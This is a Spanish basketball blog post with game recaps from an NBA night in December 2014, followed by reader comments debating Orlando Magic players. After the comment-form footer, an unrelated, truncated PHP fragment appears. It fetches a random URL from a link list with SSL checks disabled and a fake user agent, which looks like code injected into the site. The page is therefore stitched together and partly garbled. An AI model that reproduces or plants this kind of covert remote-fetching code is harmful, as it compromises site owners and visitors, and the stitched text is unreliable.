La Crónica: Remontadas inconclusas

30 de December de 2014 por txusma

4 victorias visitantes en 6 partidos esta madrugada en la NBA. Día también de remontadas que no llegan a culminarse como las de los Rockets o los Pacers. Día completo en la NBA, como prácticamente siempre.

Wizards 104  – Rockets 103

Victoria de prestigio de unos Wizards que se mantienen firmes entre la clase noble del Este. Tras una primera parte igualada, los chicos de Randy Wittman salieron más enchufados en la segunda parte y rápidamente se hicieron con una ventaja de 18 puntos liderados por Bradley Beal y Paul Pierce. Sin embargo, los Rockets no lanzaron la toalla y a mediados del último cuarto ya habían recuperado la ventaja y empatado el partido. A pesar de los esfuerzos de James Harden, los Wizards se acabaron llevando el partido y se sitúan ya con 22 victorias en 30 partidos empatando así el mejor inicio de temporada de toda su historia. La anécdota del encuentro corrió a cargo de una de las canastas del Toyota Center que tuvo que ser sustituida nada más iniciarse el partido provocando un receso de unos 35 minutos. 

Magic 102 – Heat 101

Tras 10 derbis consecutivos perdidos, Orlando por fin consiguió ganar a Miami. El partido corrió igualado hasta que a finales del tercer cuarto, los locales consiguieron 10 puntos de ventaja que amenazaban con romper el partido definitivamente. Pero los Magic tenían otros planes y un triple de Tobias Harris a falta de 1’8 s para el final del cuarto culminó una feroz remontada que dejaba todo abierto para el periodo final. En esos últimos 12 minutos Dwyane Wade, con 15 puntos, volvió ser el de sus mejores tardes pero encontró poca ayuda de sus compañeros. Victor Oladipo se convirtió en el héroe del partido al anotar o asistir en los últimos 9 puntos de los suyos. Volvió Chris Bosh pero fue Nikola Vucevic el que ganó el duelo interior, el montenegruino, más que posible All-Star este año, ha anotado más de 10 puntos en todos los partidos que ha disputado.

Bulls 92 – Pacers 90

Muy felices se las prometía Chicago cuando poco antes del final del tercer cuarto alcanzaban los 21 puntos de ventaja. Con el partido resuelto fueron los suplentes (más Jimmy Butler, que no descansa nunca) los que saltaron a jugar los últimos minutos de partidos. Pero los suplentes de los Pacers demostraron una gran pundonor y con Chris Copeland a la cabeza encadenaron un parcial de 23 a 2 que puso a los suyos por delante en solo 6 minutos. Las risas en el banquillo visitante se acabaron y los titulares tuvieron que volver a salir a rematar el partido. Un gran triple de Butler finiquitó lo que hubiera sido una gran gesta del banquillo local que se mantuvo en pista hasta el final del partido.

El resto de la jornada

Sudaron los Bucks para volver a situarse en el 50% de victorias. Llegaron a conseguir 2o puntos de ventaja en casa de los Bobcats, pero estos remontaron se pusieron por delante y se hubieran llevado el partido sinó hubiera sido por una canasta de Brandon Knight a 15 segundos del final. En el tiempo extra, ya no dieron opciones a sus rivales.

También tuvieron que esforzarse mucho los Clippers que tuvieron que pelear hasta el último minuto para derrotar a unos peleones Jazz. Blake Griffin lideró a los locales con unos números de escándalo (24-6-7-2-3).

Algo más fácil lo tuvieron los Nets en casa ante los Kings. Deron Williams y Brook Lopez volvieron a salir desde el banquillo y sus sustitutos en el quinteto, Mason Plumlee y Jarret Jack, volvieron a ser los mejores del equipo.

PREMIOS

MVP: Premio repartido entre Blake Griffin (24p – 6r – 7a – 2r – 3t), Nikola Vucevic (29p – 9r – 3a) y Bradley Beal (33p – 5r – 3a). Los 3 fueron esenciales para sus respectivos equipos acabaran llevándose partidos muy igualados.

Rookie: Rodney Hood salió de titular ante la baja de Burks en los Jazz y acabó el partido con 9 puntos, 7 rebotes, 5 asistencias y 2 robos.

Sorpresa: Danny Granger continúa con su buena racha. Ayer fueron 21 puntos con 6 triples de 7 intentos.

Decepción: 3 puntos (1 de 6 en TC) y 4 pérdidas. Josh Smith aún ha de adaptarse al juego de los Rockets. Kris Humphries se quedó sin anotar tras fallar sus 6 lanzamientos a canasta.

Esfuerzo en vano: 33 puntos, 6 rebotes y 4 asistencias de James Harden que no encontraron recompensa. Tampoco los 24 puntos, 14 rebotes, 4 asistencias y 2 tapones de Demarcus Cousins.

Imágenes | AP Photos / Getty Images

Comenta

14 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Me llama la atención lo infravalorado de Vucevic en la liga,sólo hay que ver el primer recuento de votos para el All Star.Con los números de dobles-dobles en la mano justificaban en el Plus el otro día que Wall pudiera ser titular -más que merecido,para mí es el primer o segundo base de la liga en estos momentos,de la mano con Curry- pero me asombraba que no comentaran absolutamente nada del montenegrino.Ahí sigue consolidándose como uno de los mejores 5’s de la competición.

    Tengo ganas de que muevan el cotarro los Nets. Deron dice que no le importa salir desde el banquillo pero vamos,que no se lo cree ni él.

      Citar

  2. Denise dice:
    #2

    Ruxixón:
    Me llama la atención lo infravalorado de Vucevic en la liga,sólo hay que ver el primer recuento de votos para el All Star.Con los números de dobles-dobles en la mano justificaban en el Plus el otro día que Wall pudiera ser titular -más que merecido,para mí es el primer o segundo base de la liga en estos momentos,de la mano con Curry- pero me asombraba que no comentaran absolutamente nada del montenegrino.Ahí sigue consolidándose como uno de los mejores 5’s de la competición.

    Tengo ganas de que muevan el cotarro los Nets. Deron dice que no le importa salir desde el banquillo pero vamos,que no se lo cree ni él.

    El problema con Vucevic es que es demasiado blandito en defensa, y sobre todo que está haciendo los números en el peor equipo de la liga sumando las victorias/derrotas obtenidas en los últimos 2 años y medio.
    Tal y como está de mediocre el este, el año que viene a poco que Orlando acierte en el Draft y fiche algo interesante, serán equipo de PO y la labor del montenegrino se verá mas valorada y seguramente acabe siendo All-Star.
    También Tobias Harris está haciendo una temporada de All-Star pienso, pero el balance es el que es y jugar en un equipo malo penaliza.

      Citar

  3. Denise dice:
    #3

    ¿Y que opinais de Oladipo?
    A mi cada día me parece peor jugador, no tiene muchos recursos ofensivos más alla de la penetración desde la cabeza de la bombilla, es pésimo en el clutch, no tiene tiro exterior, pierde balones con la facilidad de un cadete, tampoco es un gran asistente, poseyendo un nefasto ratio Asist/Turnovers. Que si, defiende bien y trabaja, pero este tio se le drafteó para ser estrella y jugador franquicia, y no vale para eso (y lo estoy diciendo tras una noche en la que ha jugado bien). Cuando tenga 29 años y el fisico no le acompañe va a estar semi acabado.
    Quizas me pilla en un día cabreado o algo, pero lo empaquetaba ya junto a Channing Frye por algun killer en condiciones. Quizás Klay Thompson sería mucho pedir, pero un Bradley Beal, Bledsoe ó Reggie Jackson + Lamb y/ó Perry Jones sería cojonudo.

      Citar

  4. Ruxixón dice:
    #4

    Yo creo que no hay que perder de vista de donde sale Oladipo,del peor draft de los últimos años.Y creo que ponerle la etiqueta de jugador franquicia sólo puede obedecer a que fue quien más destacó en ese draft tan pobre.Estamos hablando de un jugador cuya comparación NBA es Tony Allen (en nbadraft),¡Tony Allen! A mí me parece muy buen jugador a día de hoy,pero tiene que ir mejorando su tiro,para no depender exclusivamente de su físico como dices.Y lo de las pérdidas,está aprendiendo a jugar en una posición que no es la suya y que parece que a medio plazo es de Payton.Como SG,con menos bola en sus manos (aquí incide de nuevo el hecho de que es necesario que mejore su tiro) debería tener menos pérdidas.Paciencia Denise

      Citar

  5. Ruxixón dice:
    #5

      Citar

  6. Azabel dice:
    #6

    3 tapones de Griffin? maximo en su carrera debe ser

      Citar

  7. txusma dice:
    #7

    Yo creo que Oladipo puede ser parte importante de un equipo pero nunca jugador franquicia. Esa etiqueta solo sirve para los más grandes.

      Citar

  8. txusma dice:
    #8

    Ruxixón:
    Palomero Kings: https://www.youtube.com/watch?v=EzZk6ACFirU#t

    Eso ha sido sin querer o ya están practicando lo q está por venir?

      Citar

  9. Ruxixón dice:
    #9

    txusma: Eso ha sido sin querer o ya están practicando lo q está por venir?

    jajaja,parece que fue una caraja con el tema del cambio,pero seguro que el indio (y Sancho?) lo disfrutan

      Citar

  10. Denise dice:
    #10

    Ya, a ver, yo no quiero decir que Oladipo sea un paquetorro, pero Orlando necesita un jugador franquicia. En la agencia libre no lo va a conseguir, por lo que yo estaría dispuesto, de cara a la temporada que viene, a sacrificar a Oladipo más algo para conseguir uno. Ahora mismo, puede pasar un poco porque aun está en su contrato rookie, pero en 2 años cuando le toque renovar, solo la Qualyfing Offer es de 8’5 kilos, y se te irá a la parra pidiendote 10 ó 11, y yo no pagaría esas cantidades por un mero especialista defensivo que creo que es lo que va a ser en su carrera. Porque de PG cada día es mas malo, en atque no ha progresado casi nada en año y medio, y ojo no olvidemos que no es un rookie “al uso de 19-20 años” que el tio dentro de poco cumple 23 tacos y el margen de mejora es mucho menor que el de A’Koumpo por ejemplo.

      Citar

  11. Azabel dice:
    #11

    Comparto con q Oladipo tiene pasta de primer espada de un contender y q tiene nivel para exigir un contrato muy alto, muy al estilo steffenson, buen segunda easpada, gran defensor, buen jugador de equipo, se arregla para anotar sus puntos pero su contrato puede perjudicar el fichajke de otra estrella

    Denise, q al Gordon? Sirve para algo o fue muy elevado su pick?

      Citar

  12. Azabel dice:
    #12

    Q poco se ha visto a rodeny hood, parecia tener pasta el chaval y aun no ha demostrado nada como la mayoria de la super camada rookie de este año

      Citar

  13. Denise dice:
    #13

    Azabel:

    Denise, q al Gordon? Sirve para algo o fue muy elevado su pick?

    Bueno, a mi creo que ya sabeis que no me gustó su pick y hubiese preferido a Exum ó a Smart, pero bueno, una vez drafteado habrá que aceptarlo.
    Se lesionó a finales de noviembre y apenas hemos podido verlo una decena de partidos, pero me parece un sólido jugador que hará una decente carrera de 10-14 años en la liga, lo que ya no se si compensa haber gastado un pick 4 en él en uno de los “mejores Drafts de la historia”. La verdad es que en ataque está verdisimo y se tira unas mandarinas en posturas raras a lo Marion, aunque ha mostrado una decente mano de 3 puntos la cual no sabía que tenía un rango de tiro tan lejano. Después en los libres no lo ha hecho mal, tiene unos decentes % pese a sus malos números en la NCAA desde el 4’60. Después en defensa es un tio intenso y profesional. La verdad es que tiene mucho margen de mejora aún y eso alberga esperanzas. En su temporada sophomore creo que seguirá pecando un poco de pardillo bisoño, pero creo que a partir de su 3º año deberiamos estar hablando ya de un tio que hace dobles-dobles con la gorra y espero que lo natural sea que ande en unos promedios de 15-9 más o menos, aunque no soy tan optimisma como Viva Dirk y no lo veo llegando tan alto como Blake Griffin.

    De cara a lo que queda de temporada (vuelve a mediados de enero), sería interesante que el nefasto Vaughn le diera mas minutos, puesto que apenas ha superado los 15 minutos de media, gracias al horrible e incomprensible fichaje de Channing Frye y al afan de Vaughn por ponerle pese a sus malas actuaciones noche si y noche también. Realmente Frye tampco es un desastre, pero no pega en absoluto en este proyecto y sería interesante que Orlando lo pudiese mover a un contender en febrero por algun expiring y alguna 2º ronda (al estilo 76ers).

    Y volviendo a Gordon y terminando con él, hay quien dice que podría mutar y convertirse en un SF en años venideros, yo discrepo, no creo que tenga la velocidad ni el tiro para jugar de alero. Probablemente acabaría como Josh Smith…

    PD: Que gozada el Unicaja-Madrid. A ver si los ineptos mandamases de FIBA Europe creasen una liga semi-cerrada con los mejores equipos europeos jugando entre sí cada fin de semana (no me vale la Euroliga, no es lo mismo). Con respeto a las ciudades y equipos pequeños, a nadie le interesa ver un partido ACB entre un grande y un Fuenlabrada con los problemas economicos que atraviesan los clubes pequeños hoy día.

      Citar

  14. Azabel dice:
    #14

    gracias Denise, experto total en los Magic je

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>